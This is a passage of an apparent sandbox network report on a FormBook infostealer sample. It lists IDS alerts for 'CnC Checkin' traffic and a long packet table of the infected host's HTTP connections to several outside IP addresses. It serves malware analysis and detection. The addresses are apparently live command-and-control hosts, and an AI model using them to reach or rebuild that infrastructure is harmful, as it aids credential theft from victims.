                                                                                                                                                                                                        05/08/24-18:20:40.991637TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974380192.168.2.479.98.25.1
                                                                                                                                                                                                        05/08/24-18:21:13.889976TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974880192.168.2.464.190.62.22
                                                                                                                                                                                                        05/08/24-18:22:25.343188TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976480192.168.2.4203.161.46.103
                                                                                                                                                                                                        05/08/24-18:22:48.893765TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976880192.168.2.4162.240.81.18
                                                                                                                                                                                                        05/08/24-18:22:02.183176TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976080192.168.2.4178.211.137.59
                                                                                                                                                                                                        05/08/24-18:23:53.287883TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24978080192.168.2.491.195.240.19
                                                                                                                                                                                                        05/08/24-18:23:28.557719TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977680192.168.2.43.73.27.108

                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        May 8, 2024 18:20:40.652524948 CEST4974380192.168.2.479.98.25.1
                                                                                                                                                                                                        May 8, 2024 18:20:40.988995075 CEST804974379.98.25.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:20:40.989110947 CEST4974380192.168.2.479.98.25.1
                                                                                                                                                                                                        May 8, 2024 18:20:40.991636992 CEST4974380192.168.2.479.98.25.1
                                                                                                                                                                                                        May 8, 2024 18:20:41.324810028 CEST804974379.98.25.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:20:41.326205015 CEST804974379.98.25.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:20:41.326217890 CEST804974379.98.25.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:20:41.326324940 CEST804974379.98.25.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:20:41.326344013 CEST804974379.98.25.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:20:41.326344967 CEST4974380192.168.2.479.98.25.1
                                                                                                                                                                                                        May 8, 2024 18:20:41.326358080 CEST804974379.98.25.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:20:41.326373100 CEST804974379.98.25.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:20:41.326395035 CEST4974380192.168.2.479.98.25.1
                                                                                                                                                                                                        May 8, 2024 18:20:41.326416969 CEST4974380192.168.2.479.98.25.1
                                                                                                                                                                                                        May 8, 2024 18:20:41.331243992 CEST4974380192.168.2.479.98.25.1
                                                                                                                                                                                                        May 8, 2024 18:20:41.664325953 CEST804974379.98.25.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:05.038352013 CEST4974580192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:05.349611998 CEST804974564.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:05.349797964 CEST4974580192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:05.352807045 CEST4974580192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:05.664771080 CEST804974564.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:05.664793968 CEST804974564.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:05.664971113 CEST4974580192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:06.858540058 CEST4974580192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:07.877024889 CEST4974680192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:08.188158035 CEST804974664.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:08.188374996 CEST4974680192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:08.194433928 CEST4974680192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:08.507008076 CEST804974664.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:08.507028103 CEST804974664.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:08.507200956 CEST4974680192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:09.702290058 CEST4974680192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:10.725639105 CEST4974780192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:11.037913084 CEST804974764.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:11.038027048 CEST4974780192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:11.040277958 CEST4974780192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:11.351130962 CEST804974764.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:11.351146936 CEST804974764.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:11.351159096 CEST804974764.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:11.351383924 CEST804974764.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:11.352066994 CEST804974764.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:11.352078915 CEST804974764.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:11.352170944 CEST4974780192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:12.546322107 CEST4974780192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:13.572011948 CEST4974880192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:13.883944988 CEST804974864.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:13.884041071 CEST4974880192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:13.889976025 CEST4974880192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:14.202215910 CEST804974864.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:14.202239990 CEST804974864.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:14.202414036 CEST4974880192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:14.211174965 CEST4974880192.168.2.464.190.62.22
                                                                                                                                                                                                        May 8, 2024 18:21:14.522701979 CEST804974864.190.62.22192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:19.749906063 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:20.088932991 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:20.089149952 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:20.091270924 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:20.430386066 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:20.435359001 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:20.435386896 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:20.435446024 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:20.435462952 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:20.435487032 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:20.435502052 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:20.435516119 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:20.435518980 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:20.435534954 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:20.435551882 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:20.435556889 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:20.435565948 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:20.435600996 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:20.435620070 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:22.214211941 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:23.220772982 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:23.551904917 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:23.552017927 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:23.553885937 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:23.886049032 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:23.890723944 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:23.890743971 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:23.890757084 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:23.890772104 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:23.890789986 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:23.890816927 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:23.890825033 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:23.890839100 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:23.890847921 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:23.890866041 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:23.891165972 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:23.891180038 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:23.891206980 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:23.891227961 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:25.061728954 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:26.083499908 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:26.423280001 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.423696041 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:26.425681114 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:26.767308950 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.767335892 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.767348051 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.767359018 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.767375946 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.767388105 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.767841101 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.767882109 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.767904043 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772283077 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772459030 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772473097 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772486925 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772499084 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772512913 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772517920 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:26.772527933 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772543907 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772555113 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:26.772555113 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:26.772584915 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:27.936732054 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:28.955960989 CEST4975280192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:29.281299114 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.281390905 CEST4975280192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:29.283236980 CEST4975280192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:29.607954979 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612488031 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612510920 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612524986 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612540007 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612554073 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612570047 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612584114 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612596989 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612612963 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612612009 CEST4975280192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:29.612715006 CEST4975280192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:29.617027998 CEST4975280192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:29.941541910 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:35.247504950 CEST4975380192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:35.554980993 CEST804975313.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:35.555124044 CEST4975380192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:35.859971046 CEST804975313.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:35.860001087 CEST804975313.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:35.860016108 CEST804975313.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:35.860047102 CEST4975380192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:35.860097885 CEST4975380192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:37.061719894 CEST4975380192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:38.224852085 CEST4975480192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:38.534141064 CEST804975413.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:38.535828114 CEST4975480192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:38.846520901 CEST804975413.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:38.846544981 CEST804975413.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:38.846636057 CEST4975480192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:38.846775055 CEST804975413.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:38.846828938 CEST4975480192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:40.923737049 CEST4975480192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:41.233128071 CEST804975413.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:41.390058041 CEST4975480192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:42.409518957 CEST4975580192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:42.719527960 CEST804975513.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:42.719619036 CEST4975580192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:43.029484034 CEST804975513.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:43.029504061 CEST804975513.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:43.029601097 CEST4975580192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:43.029733896 CEST804975513.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:43.029906034 CEST4975580192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:44.233632088 CEST4975580192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:45.253735065 CEST4975680192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:45.565026999 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:45.565157890 CEST4975680192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:45.874420881 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:45.874439955 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:45.874566078 CEST4975680192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:45.874666929 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:45.874710083 CEST4975680192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:51.388602018 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:51.722870111 CEST8049757178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:51.725908041 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:51.727742910 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:52.060770035 CEST8049757178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:52.061665058 CEST8049757178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:52.061758041 CEST8049757178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:52.061805964 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:53.217915058 CEST4975680192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:21:53.233659029 CEST4975780192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:53.528212070 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:54.252517939 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:54.585637093 CEST8049758178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:54.585746050 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:54.616086960 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:54.951919079 CEST8049758178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:54.953469038 CEST8049758178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:54.953488111 CEST8049758178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:54.953669071 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:57.959145069 CEST4975880192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:58.972132921 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:59.308811903 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:59.311846972 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:59.315776110 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:21:59.651988983 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:59.652019978 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:59.653203964 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:59.653513908 CEST8049759178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:59.653666019 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:22:00.827383041 CEST4975980192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:22:01.846723080 CEST4976080192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:22:02.180246115 CEST8049760178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:02.180315018 CEST4976080192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:22:02.183176041 CEST4976080192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:22:02.518251896 CEST8049760178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:02.518805981 CEST8049760178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:02.518922091 CEST8049760178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:02.518960953 CEST4976080192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:22:02.521962881 CEST4976080192.168.2.4178.211.137.59
                                                                                                                                                                                                        May 8, 2024 18:22:02.854866982 CEST8049760178.211.137.59192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:05.827423096 CEST4975680192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:22:06.137916088 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:16.928564072 CEST4976180192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:17.126065016 CEST8049761203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:17.126137018 CEST4976180192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:17.127955914 CEST4976180192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:17.325231075 CEST8049761203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:17.342128038 CEST8049761203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:17.342660904 CEST8049761203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:17.342726946 CEST4976180192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:18.639981031 CEST4976180192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:19.658407927 CEST4976280192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:19.860110044 CEST8049762203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:19.860177994 CEST4976280192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:19.862302065 CEST4976280192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:20.063416958 CEST8049762203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:20.073838949 CEST8049762203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:20.074044943 CEST8049762203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:20.074817896 CEST4976280192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:21.151819944 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:21.151889086 CEST4975680192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:22:21.374735117 CEST4976280192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:22.400329113 CEST4976380192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:22.597848892 CEST8049763203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:22.597989082 CEST4976380192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:22.601840019 CEST4976380192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:22.798888922 CEST8049763203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:22.798912048 CEST8049763203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:22.798923969 CEST8049763203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:22.799550056 CEST8049763203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:22.813817978 CEST8049763203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:22.813831091 CEST8049763203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:22.814035892 CEST4976380192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:24.108812094 CEST4976380192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:25.141897917 CEST4976480192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:25.340779066 CEST8049764203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:25.340856075 CEST4976480192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:25.343188047 CEST4976480192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:25.541404963 CEST8049764203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:25.554493904 CEST8049764203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:25.554512024 CEST8049764203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:25.554653883 CEST4976480192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:25.557218075 CEST4976480192.168.2.4203.161.46.103
                                                                                                                                                                                                        May 8, 2024 18:22:25.755213022 CEST8049764203.161.46.103192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:27.075176001 CEST4975680192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:22:27.384445906 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:40.497626066 CEST4976580192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:40.698198080 CEST8049765162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:40.698263884 CEST4976580192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:40.700539112 CEST4976580192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:40.900898933 CEST8049765162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:40.900969982 CEST8049765162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:40.901010036 CEST8049765162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:40.901026011 CEST8049765162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:40.901063919 CEST4976580192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:40.901098967 CEST4976580192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:42.202488899 CEST4976580192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:42.402666092 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:42.402714014 CEST4975680192.168.2.413.94.60.40
                                                                                                                                                                                                        May 8, 2024 18:22:42.510505915 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:42.711679935 CEST804975613.94.60.40192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:43.221158028 CEST4976680192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:43.422631025 CEST8049766162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:43.422739983 CEST4976680192.168.2.4162.240.81.18
